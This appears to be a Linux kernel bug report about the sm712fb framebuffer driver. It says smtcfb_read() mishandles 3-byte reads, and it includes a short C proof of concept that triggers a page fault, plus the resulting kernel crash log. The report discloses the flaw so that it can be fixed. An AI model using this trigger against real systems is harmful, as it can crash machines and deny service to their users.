I found a minor in the smtcfb_read() function of the driver sm712fb.

This read function cannot handle the case that the size of the buffer is 3 and does not check for it, which may cause a page fault.

Here is a simple PoC:

#include <endian.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
	char buf[10];
	int fd = open("/dev/fb0", O_RDWR);

	/* A 3-byte read is the case smtcfb_read() does not handle. */
	read(fd, buf, 3);
	return 0;
}

The following log reveals it:

[ 2432.614490] BUG: unable to handle page fault for address: ffffc90001ffffff
[ 2432.618474] RIP: 0010:smtcfb_read+0x230/0x3e0
[ 2432.626551] Call Trace:
[ 2432.626770]  <TASK>
[ 2432.626950]  vfs_read+0x198/0xa00
[ 2432.627225]  ? do_sys_openat2+0x27d/0x350
[ 2432.627552]  ? __fget_light+0x54/0x340
[ 2432.627871]  ksys_read+0xce/0x190
[ 2432.628143]  do_syscall_64+0x43/0x90

Regards,
Zheyu Ma